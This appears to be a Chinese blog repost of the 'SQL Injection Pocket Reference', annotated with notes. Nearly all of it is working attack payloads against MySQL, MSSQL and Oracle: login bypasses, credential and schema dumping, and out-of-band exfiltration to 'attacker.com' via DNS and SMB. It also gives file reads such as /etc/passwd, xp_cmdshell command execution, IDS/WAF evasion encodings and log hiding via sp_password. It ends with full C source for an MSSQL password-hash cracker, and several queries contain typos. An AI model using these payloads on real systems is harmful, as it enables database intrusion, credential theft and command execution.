讀”SQL Injection Pocket Reference”之摘錄


1.login登錄后數據在mysql中的問題
In a login
    ' OR '1
    ' OR 1 -- -
    " OR "" = "
    " OR 1 = 1 -- -
    '='
    'LIKE'
    '=0--+

測試結果如下:



上圖中的--是注釋,-起占位作用





如上圖所示,這個LIKE的用法在新版本中被當成了warning。


 

2.Testing Version

  • VERSION();

  • @@VERSION;

  • @@GLOBAL.VERSION


Example: ' AND MID(VERSION(),1,1) = '5  - True if MySQL version is 5

截圖如下:


如上圖所示,當使用AND不會出來結果,而使用OR會出來結果。

3.MySQL-specific code

MySQL allows you to specify the version number after the exclamation mark. The syntax within the comment is only executed if the version is greater or equal to the specified version number.

Example:

UNION SELECT /*!50000 5,null;%00*//*!40000 4,null-- ,*//*!30000 3,null-- x*/0,null--+

SELECT 1/*!41320UNION/*!/*!/*!00000SELECT/*!/*!USER/*!(/*!/*!/*!*/);

上述例子是說,當!后面加上版本號之后,版本號之后的命令是可以執行的。

4.Databasae Credentials

Table:mysql.user(Privileged)
Columns:user, password
Current User: user(), current_user(),system_user(),session_user()

Example:

SELECT current_user;
UNION SELECT CONCAT(user, 0x3A, passowrd) FROM mysql.user WHERE user = 'root'

5.Database Names

Tables: information_schema.schemata,mysql_db
Columns: schema_name, db
Current DB:database(), schema()

Example:

UNION SELECT schema_name FROM infomation_schema.schemata
SELECT DISTINCT(db) FROM mysql.db (Privileged)

注:distinct一般是用來去除查詢結果中的重復記錄的,而且這個語句在select、insert、delete和update中只可以在select中使用。

6.Tables & Columns

Finding out number of columns

Order By 1

ORDER BY 1
ORDER BY 2
ORDER BY ...

Keep incrementing the number until you get a False response

Example:

1' ORDER BY 1-- - True
1' ORDER BY 2-- - True
1' ORDER BY 3-- - True
1' ORDER BY 4-- - False(Query is only using 3 columns)
-1' UNION SELECT 1,2,3-- -

Error Based

AND (SELECT * FROM SOME_EXISTING_TABLE) = 1
Operand should contain 3 column(s)

Note:

        這個示例要工作起來,當你知道table名,並且需要有錯誤提示

        這會返回表中列的數量,而不是查詢結果。

7.Retrieving Tables(檢索表)

Union:

UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;

Blind:

AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'

Error:

1.AND (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2)))
2.(@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0);
3.AND ExtractValue(1,CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1)));  --Available in 5.1.5

注:

concat()函數:將多個字符串連接成一個字符串。

語法:concat(str1,str2, ...)返回結果為連接參數產生的字符串,如果有任何一個參數為null,則返回值為null。

group_concat()函數:在有group by的查詢語句中,select指定的字段要么就包含在group by語句的后面,作為分組的依據,要么就包含在聚合函數中。group_concat()會計算哪些行屬於同一組,將屬於同一組的列顯示出來。要返回哪些列,由函數參數(就是字段名)決定。分組必須有個標准,就是根據group by指定的列進行分組。

substr()函數是用來截取數據庫某一列字段中的一部分

SUBSTR(str, pos);就是從pos開始的位置,一直截取到最后。

SUBSTR(str,pos,len);就是從pos開始的位置,截取len個字符(空白也算字符)。

EXTRACTVALUE(XML_document, XPath_string) 第一個參數:XML_document是String格式,為XML文檔對象的名稱

第二個參數:XPath_string(XPath格式的字符串)。作用:從目標XML中返回包含所查詢值得字符串。

8.Retrieving Columns

 Union:

UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'

Blind:

AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'

Error:

AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2)))
(@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@) HAVING @||MIN(@:=0);
AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name  FROM  information_schema.columns LIMIT 1)));-- Available in MySQL 5.1.5
AND (1,2,3) = (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1)-- Fixed in MySQL 5.1

NOTE:

Output is limited to 1024 chars by default.
All default database table names:~900 chars
All default database column names:~6000 chars

9.PROCEDURE ANALYSE()

1 PROCEDURE ANALYSE()   # get first column name
1 LIMIT 1,1 PROCEDURE ANALYSE() #get second column name
1 LIMIT 2,1 PROCEDURE ANALYSE()

Note:  It is necessary that the web display the first selected column of the SQL query you are injecting to.

10.Retrieving Multiple Tables/Columns at once

(SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x)
UNION SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROM information_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROM information_schema.columns

11.Find Tables from Column Name

SELECT table_name FROM information_schema.columns WHERE column_name = 'username';  --Finds the table names for any columns named username

如上命令截圖如下,用列名來撞表名:


SELECT table_name FROM information_schema.columns WHERE column_name LIKE '%user%'; --Find the table names for any columns that contain the word user

如上命令截圖如下:


12.Find Column From Table Name

SELECT column_name FROM information_schema.columns WHERE table_name = 'Users';
SELECT column_name FROM information_schema.columns WHERE table_name LIKE '%user%';

13.Avoiding the use of single/double quotations

UNION SELECT CONCAT(username,0x3a,password) FROM Users WHERE username=0x61646D696E    /*admin*/
UNION SELECT CONCAT(username,0x3a,password) FROM Users WHERE username=CHAR(97, 100, 109, 105, 110)

注:CHAR(N,... [USING charset])

CHAR()將每個參數N理解為一個整數,其返回值為一個包含這些整數的代碼值所給出的字符的字符串。NULL值被忽略。

14.String concatenation

SELECT CONCAT('a','a','a')
SELECT 'a' 'd' 'mi' 'n'
SELECT/**/'a'/**/ 'd'/**/ 'mi'/**/ 'n'

15.Privileges

     FILE privilege

     MySQL 4/5 

' UNION SELECT file_priv FROM mysql.user WHERE user = 'username
' AND MID((SELECT file_priv FROM mysql.user WHERE user = 'username'),1,1) = 'Y

    MySQL 5

' UNION SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%
' AND MID((SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%'),1,1)='Y

16.Out Of Band Channeling

  16.1 Timing(定時)

BENCHMARK()  /*用來測試Mysql性能的,該函數知識簡單地返回服務器執行表達式的時間,而不會涉及分析和優化的開銷*/
SLEEP()   (MySQL 5)   /*sleep(N)強制讓語句停留N秒鍾*/
IF(), (CASE()WHEN)    /*IF(expr1,expr2,expr3)如果expr1是TRUE(expr1<>0 and expr1<>NULL,則IF()的返回值為xpr2;否則返回值則為expr3;IF()的返回值為數字值閎字符串值。*/

Example:

' - (IF(MID(version(),1,1) LIKE 5,BENCHMARK(100000,SHA1('test')), false)) - '

注:BENCHMARK(count,expr)   BENCHMARK()函數重復countTimes次執行表達式expr,它可以用於計時MySQL處理表達式有多快。

這里需要看一下隱士類型轉換的知識點,參考鏈接:http://blog.csdn.net/hw_libo/article/details/39252427

  16.2 DNS(requires FILE privilege)

SELECT LOAD_FILE(concat('\\\\foo.',(select MID(version(),1,1)),'.attacker.com\\'));

  16.3 SMB(requires FILE privilege)

' OR 1=1 INTO OUTFILE '\\\\attacker\\SMBshare\\output.txt

   16.4 Reading Files(requires FILE privilege)

      LOAD_FILE()  MYSQL注入中,load_file()函數在獲得webshell以及提權過程中起到十分重要的作用,常被用來讀取各種配置文件。

UNION SELECT LOAD_FILE('/etc/passwd')-- -
UNION SELECT LOAD_FILE(0x2F6574632F706173737764)-- -

      Note:

File musht be located on the server host
The basedirectory for load_file() is the @@datadir
The file must be readable by the MySQL user
The file size must be less than max_allowed_packet
UNION SELECT @@max_allowed_packet(default value is 1047552 Byte)

    16.5 Writing Files(requires FILE privilege)

      INTO OUTFILE/DUMPFILE

UNION SELECT 'code' INTO OUTFILE '/tmp/file

      Note:

You can't overwrite files with INTO OUTFILE
INTO OUTFILE must be the last statement in the query
There is no way to encode the pathname, so quotes are required

     16.6 Stacked Queries with PDO

      Stacked queries are possible when PHP uses the PDO_MYSQL driver to make a connection to the database.

      Example:

AND 1=0; INSERT INTO Users(username,password,priv) VALUES('BobbyTables','k120da$$','admin');

上面的命令真正有威力的是insert語句,不過也是在知道字段名稱和表名的前提下。

17.Fuzzing and Obfuscation(模糊和混淆)

     17.1 Allowed Intermediary Characters(允許中介角色)

09
0A
0B
0C
0D
A0
20

         Example: '%0A%09UNION%0CSELECT%A0NULL%23

28
29

         Example:UNION(SELECT(column)FROM(table))

         Note:

Encoding your injection can sometimes be useful for IDS evasion
 %75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31
 SELECT %74able_%6eame FROM information_schema.tables;
 SELECT %2574able_%256eame FROM information_schema.tables;
 SELECT %u0074able_%u6eame FROM information_schema.tables;

         Futhermore,by using # or -- followed by a newline,we can split the query into separate lines, sometimes tricking the IDS.

1'#
AND 0--
UNION# I am a comment!
SELECT@tmp:=table_name x FROM--
`information_schema`.tables LIMIT 1#

          URL Encoded:1'%23%0AAND 0--%0AUNION%23 I am a comment! %0ASELECT@tmp:=table_name x FROM--%0A`information_schema`.tables LIMIT 1%23

         17.2 Allowed Intermediary Characters after AND/OR

2B
2D
7E

         Example:SELECT 1 FROM dua1 WHERE 1=1 AND-+-+-+~~((1))

           $prefixes = array(" ", "+", "-", "~", "!", "@"); //創建數組

          Operators

$operators = array("^", "=", "!=", "%", "/", "*", "&", "&&", "|", "||", "<", ">", ">>", "<<", ">=", "<=", "<>", "<=>", "AND", "OR","XOR", "DIV", "LIKE", "RLIKE", "SOUNDS LIKE", "REGEXP", "IS", "NOT");

          Constants

current_user
null, \N
true, false

18.MSSQL

    Default Databases

        pubs             Not available on MSSQL 2005

        model           Available in all versions

        msdb            Available in all versions

        tempdb        Available in all versions

        northwind    Available in all versions

        information_schema    Available from MSSQL 2000 and higher

    Comment Out Query

         /*         C-style comment

        --          SQL comment

        ;%00     Nullbyte

     Example:

SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = '';
SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3/*';

    截圖如下:

      

   

   如上圖所示,第二個例子中如果是/*,會提示缺少*/,所以改成--即可執行。

19.Testing Version

     @@VERSION

      Example:

True if MSSQL version is 2008.
SELECT * FROM Users WHERE id = '1' AND @@VERSION LIKE '%2008%';

      截圖如下:

            

     Note:    Output will also contain the version of the Windows Operating System.

 20.Database Credentials

Database..Table master..syslogins, master..sysprocesses
Columns name, loginame
Current User user, system_user, suser_sname(), is_srvrolemember('sysadmin')
Database Credentials

SELECT user, password FROM master.dbo.sysxlogins

Example:

Return current user:
SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID;

check if user is admin:
SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END);

 截圖如下:


   

21.Database Names

Database.Table master..sysdatabases
Column name
Current DB DB_NAME(i)

    Example:

SELECT DB_NAME(5);
SELECT name FROM master..sysdatabases;

    

     

22.Server Hostname

@@SERVERNAME
SERVERPROPERTY()

Example:

SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel'), SERVERPROPERTY('edition');

   Note: SERVERPROPERTY() is available from MSSQL 2005 and higher.

   截圖如下:

   

23.Tables and Columns

    23.1 Determining number of columns

ORDER BY n+1;

      Example:

Given the query: SELECT username, password, permission FROM Users WHERE id = '1';

1' ORDER BY 1--	True
1' ORDER BY 2--	True
1' ORDER BY 3--	True
1' ORDER BY 4--	False - Query is only using 3 columns
-1' UNION SELECT 1,2,3--	True

     截圖:

     

     Note:   Keep incrementing the number until you get a False response.

     The following can be used to get the columns in the current query.

GROUP BY / HAVING

      Example:

Given the query:SELECT username, password, permission FROM Users WHERE id = '1';
1' HAVING 1=1--   Column 'Users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
1' GROUP BY username HAVING 1=1--      Column 'Users.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
1' GROUP BY username, password HAVING 1=1--     Column 'Users.permission' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
1' GROUP BY username, password, permission HAVING 1=1--    No Error

     截圖如下:

     

     Note:   No error will be returned once all columns have been included.

24.Retrieving Tables

     We can retrieve the tables from two different databases, information_schema.tables or from master..sysobjects.

     注: dbname..tablename =>   dbname.dbo.tbname

     Union:

UNION SELECT name FROM master..sysobjects WHERE xtype='U'

     Blind:

AND SELECT SUBSTRING(table_name, 1,1) FROM information_schema.tables > 'A'

     Error:

AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'

     截圖如下:

     

      

       Note:   Xtype = 'U' is for User-defined tables. You can use 'V' for views.

24.Retrieving Columns

     We can retrieve the columns from two different databases, information_schema.columns or masters..syscolumns.

     Union:

UNION SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHERE name = 'tablename')

      Blind:

AND SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns > 'A'


     Error:

AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns)
AND 1 = (SELECT TOP 1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns))

25.Retrieving Multiple Tables/Columns at once

     The following 3 queries will create a temporary table/column and insert all the user-defined tables into it. It will then dump the table content and finish by deleting the table.

Create Temp Table/Column and Insert Data:
AND 1=0; BEGIN DECLARE @xy varchar(8000) SET @xy=':' SELECT @xy=@xy+' '+name FROM sysobjects WHERE xtype='U' AND name>@xy SELECT @xy AS xy INTO TMP_DB END;

 截圖如下:

  

Dump Content:
AND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROM TMP_DB);

 

Delete Table:
AND 1=0; DROP TABLE TMP_DB;

  

  An easier method is available starting with MSSQL 2005 and higher.The XML function path() works as a concatenator, allowing the retrieval of all tables with 1 query.

SELECT table_name %2b ', ' FROM information_schema.tables FOR XML PATH ('')       //SQL Server 2005+

截圖如下(當%2b編碼成+號的時候):

     

 Note:

        You can encode your query in hex to "obfuscate" your attack.

' AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x44524f5020544142c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);--

26.Avoiding the use of quotations

SELECT * FROM Users WHERE username = CHAR(97) + CHAR(100) + CHAR(109) + CHAR(105) + CHAR(110)   //admin

  截圖如下:


27.String Concatenation

SELECT CONCAT('a', 'a', 'a'); (SQL SERVER 2012)
SELECT 'a'+'d'+'mi'+'n';

      

28.Conditional Statements

IF    

CASE

   Examples:

IF 1=1 SELECT 'true' ELSE SELECT 'false';
SELECT CASE WHEN 1=1 THEN true ELSE false END;   //true 和 false需要加單引號包括起來,否則出錯

     

    Note: IF cannot be used inside a SELECT statement.

29. Timing

WAITFOR DELAY 'time_to_pass';
WAITFOR TIME 'time_to_execute';

   注: WAITFOR的作用是等待特定時間,然后繼續執行后續的語句。它包含一個參數DELAY,用來指定等待的時間。如果將該語句成功注入后,會造成數據庫返回記錄和Web請求也會相應延遲特定的時間。由於該語句不涉及條件判斷等情況,所以容易注入成功。根據Web請求是否有延遲,滲透人員就可以判斷網站是否存在漏洞。其中,WAITFOR DELAY '0:0:4' --表示延遲4秒,再繼續執行。這樣網頁響應會延遲4秒。由於WAITFOR不是SQL的標准語句,所以它只適用於SQL Server數據庫。  

    Example:

IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';

      

30.OPENROWSET Attacks

SELECT * FROM OPENROWSET('SQLOLEDB', '127.0.0.1';'sa';'p4ssw0rd','SET DMTONLY OFF execute master..xp_cmdshell "dir"');

    

31.System Command Execution

    Include an extended stored procedure named xp_cmdshell that can be used to execute operating system commands.

EXEC master.dbo.xp_cmdshell 'cmd';

       Starting with version MSSQL 2005 and higher,xp_cmdshell is disabled by default, but can be activated with the following queries:

EXEC sp_configure 'show advanced options', 1

EXEC sp_configure reconfigure    
EXEC sp_configure 'xp_cmdshell', 1
EXEC sp_configure reconfigure

         

     

       

     

        Alternatively, you can create your own procedure to achieve the same results:

DECLARE @execmd INT
EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT
EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c'

        

      if the SQL version is higher than 2000, you will have to run additional queries in order the execute the previous command:

EXEC sp_configure 'show advanced options', 1

EXEC sp_configure reconfigure
EXEC sp_configure 'OLE Automation Procedures',1
EXEC sp_configure reconfigure


Example:

Checks to see if xp_cmdshell is loaded, if it is, it checks if it is active and then proceeds to run the 'dir' command and inserts the results into TMP_DB:
' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell 'dir' SELECT @a='' SELECT @a=Replace(@a%2B'<br></font><font color="black">'%2Bdir,'<dir>','</font><font color="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSE SELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB--

32.SP_PASSWORD(Hiding Query)

     Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure.

SP_PASSWORD

32.Stacked Queries

     MSSQL supports stacked queries.

     Example:

' AND 1=0 INSERT INTO ([column1],[column2]) VALUES('value1', 'value2');
33.

Fuzzing and Obfuscation

Allowed Intermediary Characters

The following characters can be used as whitespaces.

01

Start of Heading
02 Start of Text
03 End of Text
04 End of Transmission
05 Enquiry
06 Acknowledge
07 Bell
08 Backspace
09 Horizontal Tab
0A New Line
0B Vertical Tab
0C New Page
0D Carriage Return
0E Shift Out
0F Shift In
10 Data Link Escape
11 Device Control 1
12 Device Control 2
13 Device Control 3
14 Device Control 4
15 Negative Acknowledge
16 Synchronous Idle
17 End of Transmission Block
18 Cancel
19 End of Medium
1A Substitute
1B Escape
1C File Separator
1D Group Separator
1E Record Separator
1F Unit Separator
20 Space
25 %

    Example:

S%E%L%E%C%T%01column%02FROM%03table;
A%%ND 1=%%%%%%%%1;

      Note: The percentage sign in between keywords is only possible on ASP(x) web applications.

The following characters can be also used to avoid the use of spaces.

     

22 "
28 (
29 )
5B [
5D ]

  • asd

  • asdf

  • f

asdf

   Example:

UNION(SELECT(column)FROM(table));
SELECT"table_name"FROM[information-schema].[tables];

     截圖如下:

      

34.Allowed Intermediary Characters after AND/OR

01 - 20 Range
21 !
2B +
2D -
2E .
5C \
7E ~

    Example:

SELECT 1FROM[table]WHERE\1=\1AND\1=\1;

   Note: The backslash does not seem to work with MSSQL 2000.

   

35.Encoding

     Encoding your injection can sometimes be useful for WAF/IDS evasion.

URL Encoding SELECT %74able_%6eame FROM information_schema.tables;
Double URL Encoding SELECT %2574able_%256eame FROM information_schema.tables;
Unicode Encoding SELECT %u0074able_%u6eame FROM information_schema.tables;
Invalid Hex Encoding (ASP) SELECT %tab%le_%na%me FROM information_schema.tables;
Hex Encoding ' AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x53454c4543542031 AS VARCHAR(4000)); EXEC (@S);--
HTML Entities (Needs to be verified)

%26%2365%3B%26%2378%3B%26%2368%3B%26%2332%3B%26%2349%3B%26%2361%3B%26%2349%3B

36.Password Hashing

    Passwords begin with 0x0100, the first for bytes following the 0x are a constant; the next eight bytes are the hash salt and the remaining 80 bytes are two hashes, the first 40 bytes are a case-sensitive hash of the password, while the second 40 bytes are the uppercase version.

37.Password Cracking

   This tool is designed to crack Microsoft SQL Server 2000 passwords.

/////////////////////////////////////////////////////////////////////////////////
//
//           SQLCrackCl
//
//           This will perform a dictionary attack against the
//           upper-cased hash for a password. Once this
//           has been discovered try all case variant to work
//           out the case sensitive password.
//
//           This code was written by David Litchfield to
//           demonstrate how Microsoft SQL Server 2000
//           passwords can be attacked. This can be
//           optimized considerably by not using the CryptoAPI.
//
//           (Compile with VC++ and link with advapi32.lib
//           Ensure the Platform SDK has been installed, too!)
//
//////////////////////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <windows.h>
#include <wincrypt.h>
FILE *fd=NULL;
char *lerr = "\nLength Error!\n";
int wd=0;
int OpenPasswordFile(char *pwdfile);
int CrackPassword(char *hash);
int main(int argc, char *argv[])
{
	         int err = 0;
	    if(argc !=3)
	              {
	                        printf("\n\n*** SQLCrack *** \n\n");
	                        printf("C:\\>%s hash passwd-file\n\n",argv[0]);
	                        printf("David Litchfield (david@ngssoftware.com)\n");
	                        printf("24th June 2002\n");
	                        return 0;
	              }
	    err = OpenPasswordFile(argv[2]);
	    if(err !=0)
	     {
	       return printf("\nThere was an error opening the password file %s\n",argv[2]);
	     }
	    err = CrackPassword(argv[1]);
	    fclose(fd);
	    printf("\n\n%d",wd);
	    return 0;
}
int OpenPasswordFile(char *pwdfile)
{
	    fd = fopen(pwdfile,"r");
	    if(fd)
	              return 0;
	    else
	              return 1;
}
int CrackPassword(char *hash)
{
	    char phash[100]="";
	    char pheader[8]="";
	    char pkey[12]="";
	    char pnorm[44]="";
	    char pucase[44]="";
	    char pucfirst[8]="";
	    char wttf[44]="";
	    char uwttf[100]="";
	    char *wp=NULL;
	    char *ptr=NULL;
	    int cnt = 0;
	    int count = 0;
	    unsigned int key=0;
	    unsigned int t=0;
	    unsigned int address = 0;
	    unsigned char cmp=0;
	    unsigned char x=0;
	    HCRYPTPROV hProv=0;
	    HCRYPTHASH hHash;
DWORD hl=100;
unsigned char szhash[100]="";
int len=0;
if(strlen(hash) !=94)
	      {
	              return printf("\nThe password hash is too short!\n");
	      }
if(hash[0]==0x30 && (hash[1]== 'x' || hash[1] == 'X'))
	      {
	              hash = hash + 2;
	              strncpy(pheader,hash,4);
	              printf("\nHeader\t\t: %s",pheader);
	              if(strlen(pheader)!=4)
	                        return printf("%s",lerr);
	              hash = hash + 4;
	              strncpy(pkey,hash,8);
	              printf("\nRand key\t: %s",pkey);
	              if(strlen(pkey)!=8)
	                        return printf("%s",lerr);
	              hash = hash + 8;
	              strncpy(pnorm,hash,40);
	              printf("\nNormal\t\t: %s",pnorm);
	              if(strlen(pnorm)!=40)
	                        return printf("%s",lerr);
	              hash = hash + 40;
	              strncpy(pucase,hash,40);
	              printf("\nUpper Case\t: %s",pucase);
	              if(strlen(pucase)!=40)
	                        return printf("%s",lerr);
	              strncpy(pucfirst,pucase,2);
	              sscanf(pucfirst,"%x",&cmp);
	      }
else
	      {
	              return printf("The password hash has an invalid format!\n");
	      }
printf("\n\n       Trying...\n");
if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL                 ,0))
  {
	      if(GetLastError()==NTE_BAD_KEYSET)
	              {
	                        // KeySet does not exist. So create a new keyset
	                        if(!CryptAcquireContext(&hProv,
	                                             NULL,
	                                             NULL,
	                                             PROV_RSA_FULL,
	                                             CRYPT_NEWKEYSET ))
	                           {
	                                    printf("FAILLLLLLL!!!");
	                                    return FALSE;
	                           }
	       }
}
while(1)
	     {
	       // get a word to try from the file
	       ZeroMemory(wttf,44);
	       if(!fgets(wttf,40,fd))
	          return printf("\nEnd of password file. Didn't find the password.\n");
	       wd++;
	       len = strlen(wttf);
	       wttf[len-1]=0x00;
	       ZeroMemory(uwttf,84);
	       // Convert the word to UNICODE
	       while(count < len)
	                 {
	                           uwttf[cnt]=wttf[count];
	                           cnt++;
	                           uwttf[cnt]=0x00;
	                           count++;
	                           cnt++;
	                 }
	       len --;
	       wp = &uwttf;
	       sscanf(pkey,"%x",&key);
	       cnt = cnt - 2;
	       // Append the random stuff to the end of
	       // the uppercase unicode password
	       t = key >> 24;
	       x = (unsigned char) t;
	       uwttf[cnt]=x;
	       cnt++;
	       t = key << 8;
	       t = t >> 24;
	     x = (unsigned char) t;
	     uwttf[cnt]=x;
	     cnt++;
	     t = key << 16;
	     t = t >> 24;
	     x = (unsigned char) t;
	     uwttf[cnt]=x;
	     cnt++;
	     t = key << 24;
	     t = t >> 24;
	     x = (unsigned char) t;
	     uwttf[cnt]=x;
	     cnt++;
// Create the hash
if(!CryptCreateHash(hProv, CALG_SHA, 0 , 0, &hHash))
	     {
	               printf("Error %x during CryptCreatHash!\n", GetLastError());
	               return 0;
	     }
if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0))
	     {
	               printf("Error %x during CryptHashData!\n", GetLastError());
	               return FALSE;
	     }
CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0);
// Test the first byte only. Much quicker.
if(szhash[0] == cmp)
	     {
	               // If first byte matches try the rest
	               ptr = pucase;
	               cnt = 1;
	               while(cnt < 20)
	               {
	                           ptr = ptr + 2;
	                           strncpy(pucfirst,ptr,2);
	                           sscanf(pucfirst,"%x",&cmp);
	                           if(szhash[cnt]==cmp)
	                                    cnt ++;
	                           else
	                           {
	                                    break;
	                           }
	               }
	               if(cnt == 20)
	               {
	                    // We've found the password
	                    printf("\nA MATCH!!! Password is %s\n",wttf);
	                    return 0;
	                 }
	         }
	         count = 0;
	         cnt=0;
	       }
  return 0;
}
					

38. Oracle

   Default Databases

SYSTEM Available in all versions
SYSAUX Available in all versions

 39.Comment Out Query

   The following can be used to comment out the  rest of the query after your injection:

-- SQL comment

   Example:

SELECT * FROm Users WHERE username = '' OR 1=1 --' AND password = '';

    截圖如下:

    

40.Testing Version

SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;

  截圖如下:

   

    

    Notes:

        All SELECT statements in Oracle must contain a table.

        dual is a dummy table which can be used for testing.

41.Database Credentials

SELECT username FROM all_users; Available on all versions
SELECT name, password from sys.user$; privileged , <= 10g
SELECT name, spare4 from sys.user$; Privileged, <= 11g

截圖如下:

   

   

42.Database Names

    Current Database

SELECT name FROM v$database;

SELECT instance_name FROM v$instance
SELECT global_name FROM global_name
SELECT SYS.DATABASE_NAME FROM DUAL;



User Databases

SELECT DISTINCT owner FROM all_tables;


Server Hostname:

SELECT name FROM v$instance; (Privileged)
SELECT UTL_INADDR.get_host_name FROM dual;

SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;

SELECT UTL_INADDR.get_host_address FROM dual;


43.Tables and Columns

     Retrieving Tables

SELECT table_name FROm all_tables;

    

   Restrieving Columns:

SELECT column_name FROM all_tab_columns;

       

 Find Tables from Column Name

SELECT table_name FROM all_tab_tables WHERE table_name = 'Users';

     

   Find Columns From Table Name

SELECT table_name FROM all_tab_tables WHERE column_name = 'password';

     

   Retrieving Multiple Tables at once

SELECT RTRIM(XMLAGG(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()'),',') FROM all_tables;

Avoiding the use of quotations

    Unlike other RDBMS, Oracle allows table/column names to be encoded.

SELECT 0x09120911091 FROM dual; Hex Encoding.
SELECT CHR(32)||CHR(92)||CHR(93) FROM dual; CHR() Function.

      

   String Concatenation

SELECT 'a'||'d'||'mi'||'n' FROM dual;

       Conditional Statements

SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END FROM dual

       

       Timing

        Time Delay

SELECT UTL_INADDR.get_host_address('non-existant-domain.com') FROM dual;

          Heavy Time Delays

AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) > 0 AND 300 > ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1));

          Privileges

SELECT privilege FROM session_privs;
SELECT grantee, granted_role FROM dba_role_privs; (Privileged)

           

       Out of Band Channeling

          DNS Requests

SELECT UTL_HTTP.REQUEST('http://localhost') FROM dual;
SELECT UTL_INADDR.get_host_address('localhost.com') FROM dual;




注意!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系我们删除。



 
粤ICP备14056181号  © 2014-2021 ITdaan.com